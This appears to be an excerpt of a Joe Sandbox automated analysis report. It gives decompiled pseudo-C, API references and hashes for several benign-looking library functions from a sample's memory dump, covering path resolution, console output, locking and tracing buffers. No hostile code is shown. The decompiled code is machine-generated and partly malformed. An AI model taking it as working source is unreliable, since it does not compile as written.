GetFullPathNameW.KERNEL32(?,04C48300,0531DAE8,00000000,00D1049B,00000000,?,00D1E7A3,00D1049B,00D1049B,?,?,00CBF005,00CC01ED,00CBF005,00000001), ref: 00D1059E
GetLastError.KERNEL32(?,00D1E7A3,00D1049B,00D1049B,?,?,00CBF005,00CC01ED,00CBF005,00000001,00000000,00000000,?,00D1049B,00CBF005,00CC01ED), ref: 00D105A8
__dosmaperr.LIBCMT ref: 00D105AF
GetFullPathNameW.KERNEL32(?,04C48300,0531DAE8,00000000,04C48301,?,00D1E7A3,00D1049B,00D1049B,?,?,00CBF005,00CC01ED,00CBF005,00000001,00000000), ref: 00D105D9

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: FullNamePath$ErrorLast__dosmaperr
String ID:
API String ID: 1391015842-0
Opcode ID: 71015087188ce52c3611d76ed00de36f296afbd98f110f90aa8475eb8b6f6a71
Instruction ID: a56ae8859c4438ba48498aa3713c504e591118aeb67b790dd32cce5ee3310b06
Opcode Fuzzy Hash: 71015087188ce52c3611d76ed00de36f296afbd98f110f90aa8475eb8b6f6a71
Instruction Fuzzy Hash: 0FF03636200701BFEB206BB6DC04E9BBFAAEF44360714841AF65AC2560DB71E8909B70

Uniqueness

Uniqueness Score: -1.00%

Function 00D10522 Relevance: 6.0, APIs: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D10522(void* __ecx, WCHAR** _a4) {
				long _t8;
				LPWSTR* _t11;
				WCHAR** _t19;
				void* _t20;

				_t19 = _a4;
				_t20 = __ecx;
				_t2 = _t20 + 8; // 0x531dae8
				_t3 = _t20 + 0xc; // 0x4c48300
				_t8 = GetFullPathNameW( *_t19,  *_t3,  *_t2, 0);
				if(_t8 == 0) {
					L1:
					E00D0D2CD(GetLastError());
					return  *((intOrPtr*)(E00D0D2A7()));
				}
				_t4 = _t20 + 0xc; // 0x4c48300
				if(_t8 <=  *_t4) {
					L5:
					 *(_t20 + 0x10) = _t8;
					return 0;
				}
				_t11 = L00D0EB37(_t20, _t8 + 1);
				if(_t11 == 0) {
					_t5 = _t20 + 8; // 0x531dae8
					_t6 = _t20 + 0xc; // 0x4c48300
					_t8 = GetFullPathNameW( *_t19,  *_t6,  *_t5, _t11);
					if(_t8 == 0) {
						goto L1;
					}
					goto L5;
				}
				return _t11;
			}

0x00d10529
0x00d1052c
0x00d10530
0x00d10533
0x00d10538
0x00d10540
0x00d10542
0x00d10549
0x00000000
0x00d10554
0x00d10558
0x00d1055b
0x00d1057d
0x00d1057d
0x00000000
0x00d10580
0x00d10561
0x00d10568
0x00d1056b
0x00d1056e
0x00d10573
0x00d1057b
0x00000000
0x00000000
0x00000000
0x00d1057b
0x00d10585

APIs

GetFullPathNameW.KERNEL32(?,04C48300,0531DAE8,00000000,00D1049B,00000000,?,00D1E81B,00D1049B,?,?,00CBF005,00CC01ED,00CBF005,00000001,00000000), ref: 00D10538
GetLastError.KERNEL32(?,00D1E81B,00D1049B,?,?,00CBF005,00CC01ED,00CBF005,00000001,00000000,00000000,?,00D1049B,00CBF005,00CC01ED,?), ref: 00D10542
__dosmaperr.LIBCMT ref: 00D10549
GetFullPathNameW.KERNEL32(?,04C48300,0531DAE8,00000000,04C48301,?,00D1E81B,00D1049B,?,?,00CBF005,00CC01ED,00CBF005,00000001,00000000,00000000), ref: 00D10573

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: FullNamePath$ErrorLast__dosmaperr
String ID:
API String ID: 1391015842-0
Opcode ID: 58733846ee0b07e8e8a34fec39dcf1897d1e7f3e0cb76e7f5e43691957dcce7f
Instruction ID: 773f053862c7f503511e032a2d3ec0ba9441023f0ebec5e059d906e083718b9c
Opcode Fuzzy Hash: 58733846ee0b07e8e8a34fec39dcf1897d1e7f3e0cb76e7f5e43691957dcce7f
Instruction Fuzzy Hash: 52F0A432200740BFEB206BB6DC04E977FAAFF44360754842AF55AC2561DFB1E8909B70

Uniqueness

Uniqueness Score: -1.00%

Function 00D228E5 Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D228E5(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0xd40a90, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E00D22960();
					E00D2293A();
					_t13 = WriteConsoleW( *0xd40a90, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x00d22902
0x00d22906
0x00d22913
0x00d22918
0x00d22933
0x00d22933
0x00d22939

APIs

WriteConsoleW.KERNEL32(?,?,?,00000000,?,?,00D1E848,?,00000001,?,?,?,00D10DA8,?,?,00000000), ref: 00D228FC
GetLastError.KERNEL32(?,00D1E848,?,00000001,?,?,?,00D10DA8,?,?,00000000,?,?,?,00D106F3,?), ref: 00D22908

Part of subcall function 00D22960: CloseHandle.KERNEL32(FFFFFFFE,00D22918,?,00D1E848,?,00000001,?,?,?,00D10DA8,?,?,00000000,?,?), ref: 00D22970

___initconout.LIBCMT ref: 00D22918

Part of subcall function 00D2293A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00D228D6,00D1E835,?,?,00D10DA8,?,?,00000000,?), ref: 00D2294D

WriteConsoleW.KERNEL32(?,?,?,00000000,?,00D1E848,?,00000001,?,?,?,00D10DA8,?,?,00000000,?), ref: 00D2292D

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 5b680af587d2ee62b851acf5d54c753bff8060d1756fcde742d64f7b392c0551
Instruction ID: a73c28cba50489ef3ecfe74a92e1a9fef12ca27bfc1844aa3913d1a815520e89
Opcode Fuzzy Hash: 5b680af587d2ee62b851acf5d54c753bff8060d1756fcde742d64f7b392c0551
Instruction Fuzzy Hash: 9FF0AC36541269BBCF221F95EC05AAA3F66FB1D3B5F044415FB1ED5620CB3289609BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00CC85A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00CC85A0(signed int __ecx, signed int _a4) {
				void* _v16;
				signed int _v24;
				signed int _v32;
				char _v49;
				char _v52;
				char _v53;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				signed int _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t67;
				signed int _t72;
				signed int _t74;
				signed int _t76;
				void* _t83;
				signed char _t88;
				intOrPtr _t89;
				signed int* _t92;
				signed int _t95;
				intOrPtr _t101;
				signed int _t107;
				intOrPtr _t114;
				signed int _t116;
				signed int _t123;
				signed int _t124;
				signed int _t128;
				signed int _t130;
				void* _t146;

				_t123 = __ecx;
				_t67 =  *0xd40014; // 0xfbddd969
				_v24 = _t67 ^ _t130;
				 *((intOrPtr*)(__ecx + 0x48)) =  *((intOrPtr*)(__ecx + 0x48)) + 1;
				asm("adc dword [ecx+0x4c], 0x0");
				_t124 = _a4;
				_t88 =  >=  ? ( *(__ecx + 0x5d + _t124 * 8) & 0x000000ff) >> 0x00000003 & 0x000000ff : 1;
				_v49 = 0xff;
				_t72 =  *((intOrPtr*)(__ecx + 0x2d8)) + 0x40;
				_v68 = _t72;
				__imp__TryAcquireSRWLockExclusive(_t72);
				if(_t72 == 0) {
					L00CC8B90(_t72, _v72);
				}
				_v68 = _t88 & 0x000000ff;
				_t74 = 0;
				_t125 = _t124 << 5;
				_v76 = _t124 << 5;
				_v60 = _t123;
				asm("o16 nop [cs:eax+eax]");
				do {
					_v64 = _t74;
					_t89 =  *((intOrPtr*)(_t123 + 0x2d8));
					_t92 =  *(_t89 + _v76 + 0x48);
					_t76 =  *_t92;
					if(_t76 == 0) {
						_t76 = L00CD87D0(_t89 + _v76 + 0x48, _t89, 0x21,  *((intOrPtr*)(_t89 + _v76 + 0x54)), 0x4000,  &_v53);
						if(_t76 == 0) {
							goto L17;
						} else {
							_t125 = _t76 >> 0x00000009 & 0x00000fe0;
							_t92 = (_t76 >> 0x00000009 & 0x00000fe0) + (_t76 & 0xffe00000) - (( *((_t76 >> 0x00000009 & 0x00000fe0) + (_t76 & 0xffe00000) + 0x101e) & 0x3f) << 5) + 0x1000;
							goto L10;
						}
					} else {
						_v53 = 0;
						_t123 =  *_t76;
						if(_t123 == 0) {
							_t128 = 0;
							goto L9;
						} else {
							_t128 = _t123;
							asm("bswap esi");
							if((_t128 ^ _t76) > 0x1fffff || (_t128 & 0x001fc000) == 0) {
								_t89 =  *((intOrPtr*)(_t89 + _v76 + 0x54));
								asm("pcmpeqd xmm0, xmm0");
								asm("movdqa [esp+0x20], xmm0");
								_t125 =  &_v52;
								_t83 = E00CC88D0(_t125, "first", _t123, 0);
								_push(_t125);
								E00C90790(_t83);
								E00CC8960(_t89, _t146);
								L17:
								_t107 = _a4;
								_t95 = _v64;
							} else {
								asm("prefetcht0 [esi]");
								L9:
								 *_t92 = _t128;
								_t116 = _t92[3];
								_t125 = _t116 + 0x00000002 & 0x00003ffe;
								_t92[3] = _t116 & 0xffffc001 | _t116 + 0x00000002 & 0x00003ffe;
								_t123 = _v60;
								goto L10;
							}
						}
					}
					L15:
					 *_t123 =  *_t123 + ( *(_t123 + 0x5e + _t107 * 8) & 0x0000ffff) * _t95;
					__imp__ReleaseSRWLockExclusive();
					return E00CFE643(( *(_t123 + 0x5e + _t107 * 8) & 0x0000ffff) * _t95, _t89, _v32 ^ _t130, _t107, _t123, _t125, _v72);
					L10:
					_t114 =  *((intOrPtr*)(_t89 + 0x117c)) +  *((intOrPtr*)(_t92[2] + 0xc));
					_t101 =  *((intOrPtr*)(_t89 + 0x1180));
					 *((intOrPtr*)(_t89 + 0x117c)) = _t114;
					_t115 =  >  ? _t101 : _t114;
					 *((intOrPtr*)(_t89 + 0x1180)) =  >  ? _t101 : _t114;
					_t107 = _a4;
					asm("bswap ecx");
					 *_t76 =  *(_t123 + 0x58 + _t107 * 8);
					 *(_t123 + 0x58 + _t107 * 8) = _t76;
					_t74 = _v64 + 1;
					 *((char*)(_t123 + 0x5c + _t107 * 8)) =  *((char*)(_t123 + 0x5c + _t107 * 8)) + 1;
				} while (_v68 != _t74);
				_t95 = _v68;
				goto L15;
			}

0x00cc85ac
0x00cc85ae
0x00cc85b5
0x00cc85b9
0x00cc85bd
0x00cc85c1
0x00cc85d6
0x00cc85d9
0x00cc85e4
0x00cc85e7
0x00cc85ec
0x00cc85f4
0x00cc85fa
0x00cc85fa
0x00cc8602
0x00cc8606
0x00cc8608
0x00cc860b
0x00cc860f
0x00cc8613
0x00cc8620
0x00cc8620
0x00cc8624
0x00cc862e
0x00cc8632
0x00cc8636
0x00cc86f1
0x00cc86f8
0x00000000
0x00cc86fe
0x00cc870b
0x00cc8724
0x00000000
0x00cc8724
0x00cc863c
0x00cc863c
0x00cc8641
0x00cc8645
0x00cc8670
0x00000000
0x00cc8647
0x00cc8647
0x00cc8649
0x00cc8655
0x00cc8760
0x00cc8764
0x00cc8768
0x00cc876e
0x00cc877c
0x00cc8781
0x00cc8782
0x00cc878c
0x00cc8791
0x00cc8791
0x00cc8794
0x00cc8669
0x00cc8669
0x00cc8672
0x00cc8672
0x00cc8674
0x00cc867a
0x00cc8688
0x00cc868b
0x00000000
0x00cc868b
0x00cc8655
0x00cc8645
0x00cc8733
0x00cc873b
0x00cc8741
0x00cc8759
0x00cc868f
0x00cc8698
0x00cc869b
0x00cc86a1
0x00cc86a9
0x00cc86ac
0x00cc86b2
0x00cc86b9
0x00cc86bb
0x00cc86bd
0x00cc86c5
0x00cc86c6
0x00cc86ca
0x00cc872f
0x00000000

APIs

TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00CC85EC
ReleaseSRWLockExclusive.KERNEL32(?,?,00000021,?,00004000,000000FF), ref: 00CC8741

Part of subcall function 00CC8B90: TryAcquireSRWLockExclusive.KERNEL32(00D54B90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CC8BAC
Part of subcall function 00CC8B90: AcquireSRWLockExclusive.KERNEL32(00D54B90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CC8BDD

Strings

first, xrefs: 00CC8777

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ExclusiveLock$Acquire$Release
String ID: first
API String ID: 1678258262-2456940119
Opcode ID: 0d211275577de8aca88dec55cfb5f0bfae0235b61831cf07988c1777b5ef0d0d
Instruction ID: 166a5374e8774497916215e87876099c941413df9ad4a90ac3ba4b071b6f5694
Opcode Fuzzy Hash: 0d211275577de8aca88dec55cfb5f0bfae0235b61831cf07988c1777b5ef0d0d
Instruction Fuzzy Hash: 6C51D1716043419FC704DF28C880B6BBBE1BFC8354F24896DF9999B295DB34E949CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00CD6120 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E00CD6120(signed int __ebx, signed int __ecx, signed int __edi, void* __esi, void* __fp0, intOrPtr _a12) {
				void* _v0;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* _t35;
				signed int _t36;
				signed int _t64;
				unsigned int _t67;
				signed int _t87;
				signed int _t90;
				signed int _t92;
				void* _t93;

				_t106 = __fp0;
				_t83 = __edi;
				_t56 = __ebx;
				if( *((char*)(__ecx + 0x3f0)) == 0) {
					return _t35;
				} else {
					_pop(_t89);
					_t90 = _t92;
					_push(__ebx);
					_push(__edi);
					_push(__esi);
					_t93 = _t92 - 0x18;
					_t87 = __ecx;
					_t36 =  *0xd40014; // 0xfbddd969
					_v20 = _t36 ^ _t90;
					_t38 = E00CD7530(__ecx + 0x3f4);
					if(_t38 != 0) {
						L23:
						return E00CFE643(_t38, _t56, _v24 ^ _t90, _t67, _t83, _t87);
					} else {
						_t83 =  *(__ecx + 0x3fc);
						__imp__TryAcquireSRWLockExclusive(_t83);
						if(_t38 == 0) {
							L00CC8CF0(__ebx, _t83, _t67, __eflags, __fp0);
						}
						_v40 = _t83;
						_t38 = L00CC7BB0(4,  &_v0);
						_t93 = _t93 + 8;
						_v28 = _t87;
						_t87 =  *(_t87 + 0x404);
						if(_t87 == 0) {
							L22:
							__imp__ReleaseSRWLockExclusive(_v40);
							goto L23;
						} else {
							_t64 = _t38;
							_t67 = (((_t87 - (_t87 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t87 - (_t87 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t87 - (_t87 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t87 - (_t87 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) * 0x1010101 >> 0x18;
							if(_t67 > 1) {
								__eflags = _t64 - _t87;
								if(_t64 >= _t87) {
									_t83 = _t67;
									_t10 = _t64 % _t87;
									__eflags = _t10;
									_t56 = _t10;
								} else {
									_t56 = _t64;
								}
							} else {
								_t56 = _t87 - 0x00000001 & _t64;
							}
							_t38 =  *( *((intOrPtr*)(_v28 + 0x400)) + _t56 * 4);
							if(_t38 != 0) {
								_t83 =  *_t38;
								if(_t83 != 0) {
									_v36 = _t87 - 1;
									_v44 = _v0;
									_v32 = _t67;
									do {
										_t38 =  *(_t83 + 4);
										if(_t38 == _t64) {
											_t38 = _v44;
											__eflags =  *((intOrPtr*)(_t83 + 8)) - _v44;
											if( *((intOrPtr*)(_t83 + 8)) == _v44) {
												__eflags = _v20 + 4;
												_push(_a12);
												E00CD62A0(_v20 + 4, _t83 + 0xc, _t106);
												asm("int3");
												asm("int3");
												asm("int3");
												_push(_t90);
												return 0xc80000;
											} else {
												goto L15;
											}
										} else {
											if(_t67 > 1) {
												__eflags = _t38 - _t87;
												if(_t38 >= _t87) {
													_t27 = _t38 % _t87;
													__eflags = _t27;
													_t38 = _t27;
													_t67 = _v32;
												}
											} else {
												_t38 = _t38 & _v36;
											}
											if(_t38 == _t56) {
												goto L15;
											} else {
												goto L22;
											}
										}
										goto L26;
										L15:
										_t83 =  *_t83;
										__eflags = _t83;
									} while (_t83 != 0);
								}
							}
							goto L22;
						}
					}
				}
				L26:
			}

0x00cd6120
0x00cd6120
0x00cd6120
0x00cd612a
0x00cd6133
0x00cd612c
0x00cd612c
0x00cd6141
0x00cd6143
0x00cd6144
0x00cd6145
0x00cd6146
0x00cd6149
0x00cd614b
0x00cd6152
0x00cd615b
0x00cd6162
0x00cd625a
0x00cd626b
0x00cd6168
0x00cd6168
0x00cd616f
0x00cd6177
0x00cd6270
0x00cd6270
0x00cd617d
0x00cd6186
0x00cd618b
0x00cd618e
0x00cd6191
0x00cd6199
0x00cd6251
0x00cd6254
0x00000000
0x00cd619f
0x00cd619f
0x00cd61d4
0x00cd61da
0x00cd61e3
0x00cd61e5
0x00cd61ed
0x00cd61f1
0x00cd61f1
0x00cd61f3
0x00cd61e7
0x00cd61e7
0x00cd61e7
0x00cd61dc
0x00cd61df
0x00cd61df
0x00cd6200
0x00cd6205
0x00cd6207
0x00cd620b
0x00cd6210
0x00cd6216
0x00cd6219
0x00cd622e
0x00cd622e
0x00cd6233
0x00cd6220
0x00cd6223
0x00cd6226
0x00cd6280
0x00cd6285
0x00cd6288
0x00cd628d
0x00cd628e
0x00cd628f
0x00cd6290
0x00cd6299
0x00000000
0x00000000
0x00000000
0x00cd6235
0x00cd6238
0x00cd6240
0x00cd6242
0x00cd6246
0x00cd6246
0x00cd6248
0x00cd624a
0x00cd624a
0x00cd623a
0x00cd623a
0x00cd623a
0x00cd624f
0x00000000
0x00000000
0x00000000
0x00000000
0x00cd624f
0x00000000
0x00cd6228
0x00cd6228
0x00cd622a
0x00cd622a
0x00cd622e
0x00cd620b
0x00000000
0x00cd6205
0x00cd6199
0x00cd6162
0x00000000

APIs

Part of subcall function 00CD7530: TlsGetValue.KERNEL32(?,?,?,00CDD0B3,?,?,00000000,?,00CC9DF6,?,?,00000000,?,00000000), ref: 00CD753D

TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00CD616F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 00CD6254

Strings

MZx, xrefs: 00CD6293

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ExclusiveLock$AcquireReleaseValue
String ID: MZx
API String ID: 421378090-2575928145
Opcode ID: 16d1ab4c944f3ee7f620ef84452d8c99650af37e66723ba99e950f7bcc6d938a
Instruction ID: fbeb04761758fe257aa2f750a7c2e83c12170b50e05175f16918c6ae24b1d5d7
Opcode Fuzzy Hash: 16d1ab4c944f3ee7f620ef84452d8c99650af37e66723ba99e950f7bcc6d938a
Instruction Fuzzy Hash: CA410472B001098BCB24DE99D84466EB7F6EBD4720F28C12BEA19EB705DB30ED41C791

Uniqueness

Uniqueness Score: -1.00%

Function 00CCB810 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00CCB810(intOrPtr* __ecx, void* __fp0, unsigned int _a4) {
				signed int _v20;
				unsigned int _v28;
				char _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				unsigned int _t37;
				unsigned int _t41;
				intOrPtr _t45;
				char _t46;
				void* _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				unsigned int _t71;
				signed int _t75;
				intOrPtr _t76;
				unsigned int _t79;
				intOrPtr* _t81;
				signed int _t82;
				void* _t83;
				void* _t84;
				intOrPtr _t91;
				void* _t93;

				_t93 = __fp0;
				_t81 = __ecx;
				_t79 = _a4;
				_t32 =  *0xd40014; // 0xfbddd969
				_v20 = _t32 ^ _t82;
				 *__ecx = 0xd2f0b4;
				 *((intOrPtr*)(__ecx + 4)) = 0xd2f0bc;
				asm("bt ecx, eax");
				if(_t79 >> 0x13 >= 0) {
					_t37 = _t79 >> 0x15;
					__eflags = _t37;
					 *((char*)(_t37 + 0xd50a6c)) = 1;
				} else {
					_push(_t79);
					L00CBE930();
					_t83 = _t83 + 4;
				}
				 *(_t81 + 8) = _t79;
				 *((intOrPtr*)(_t81 + 0xc)) = 0;
				 *((intOrPtr*)(_t81 + 0x10)) = 0;
				 *((intOrPtr*)(_t81 + 0x14)) =  *((intOrPtr*)(_t79 + 0x1e4));
				E00CE0190( &_v28);
				_t84 = _t83 + 4;
				E00CE01F0( &_v28,  &_v28, _t93, _t81);
				_t41 = _v28;
				_t75 = _t41 >> 0x13;
				_t76 =  *((intOrPtr*)(0xd48a6c + _t75 * 4));
				asm("bt edx, ecx");
				if(_t75 < 0) {
					_push(_t41);
					L00CBEA30(_t41, _t93);
					_t84 = _t84 + 4;
				}
				_v44 = _t81 + 4;
				_t58 = E00CE0250(_t76);
				_t45 =  *((intOrPtr*)(E00CE0870(_t76)));
				_t88 = _t45;
				if(_t45 != 0) {
					asm("lock inc dword [eax+0x4]");
				}
				_t46 = E00CE03D0(_t58, _t58, _t88, _t93, _v44, "ThreadLocalEventBuffer", _t45);
				L00CC6B10();
				_v40 = _t46;
				_t59 = _t79 + 4;
				__imp__TryAcquireSRWLockExclusive(_t59);
				if(_t46 == 0) {
					L00CC8CF0(_t59, _t59, _t76, __eflags, _t93);
				}
				_v44 = _t59;
				_t60 =  *((intOrPtr*)(E00CE0870(_t76)));
				if(_t60 != 0) {
					asm("lock inc dword [ebx+0x4]");
				}
				_t80 = _t79 + 0x1b4;
				_v36 =  &_v40;
				_push( &_v32);
				_t78 =  &_v36;
				E00CCF530(_t79 + 0x1b4, _t93,  &_v28,  &_v40, 0xd36193,  &_v36);
				_t71 = _v28;
				_t52 =  *((intOrPtr*)(_t71 + 0xc));
				 *((intOrPtr*)(_t71 + 0xc)) = _t60;
				_t91 =  *((intOrPtr*)(_t71 + 0xc));
				if(_t91 != 0) {
					asm("lock dec dword [eax+0x4]");
					if(_t91 == 0) {
						E00CCB410(_t52);
					}
				}
				__imp__ReleaseSRWLockExclusive();
				E00CFE643(_t52, _t60, _v20 ^ _t82, _t78, _t80, _t81, _v44);
				return _t81;
			}

0x00ccb810
0x00ccb819
0x00ccb81b
0x00ccb81e
0x00ccb825
0x00ccb828
0x00ccb82e
0x00ccb846
0x00ccb849
0x00ccb858
0x00ccb858
0x00ccb85b
0x00ccb84b
0x00ccb84b
0x00ccb84c
0x00ccb851
0x00ccb851
0x00ccb862
0x00ccb865
0x00ccb86c
0x00ccb879
0x00ccb880
0x00ccb885
0x00ccb88b
0x00ccb890
0x00ccb89a
0x00ccb89d
0x00ccb8a4
0x00ccb8a7
0x00ccb8a9
0x00ccb8aa
0x00ccb8af
0x00ccb8af
0x00ccb8b5
0x00ccb8bd
0x00ccb8c4
0x00ccb8c6
0x00ccb8c8
0x00ccb8ca
0x00ccb8ca
0x00ccb8d9
0x00ccb8de
0x00ccb8e3
0x00ccb8e6
0x00ccb8ea
0x00ccb8f2
0x00ccb968
0x00ccb968
0x00ccb8f4
0x00ccb8fc
0x00ccb900
0x00ccb902
0x00ccb902
0x00ccb906
0x00ccb90f
0x00ccb917
0x00ccb918
0x00ccb926
0x00ccb92b
0x00ccb92e
0x00ccb931
0x00ccb934
0x00ccb936
0x00ccb938
0x00ccb93c
0x00ccb93f
0x00ccb944
0x00ccb93c
0x00ccb94a
0x00ccb955
0x00ccb963

APIs

TryAcquireSRWLockExclusive.KERNEL32(00D2F0BC,?,ThreadLocalEventBuffer,?), ref: 00CCB8EA
ReleaseSRWLockExclusive.KERNEL32(?,?,?,00D36193,?,?), ref: 00CCB94A

Strings

ThreadLocalEventBuffer, xrefs: 00CCB8D1

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

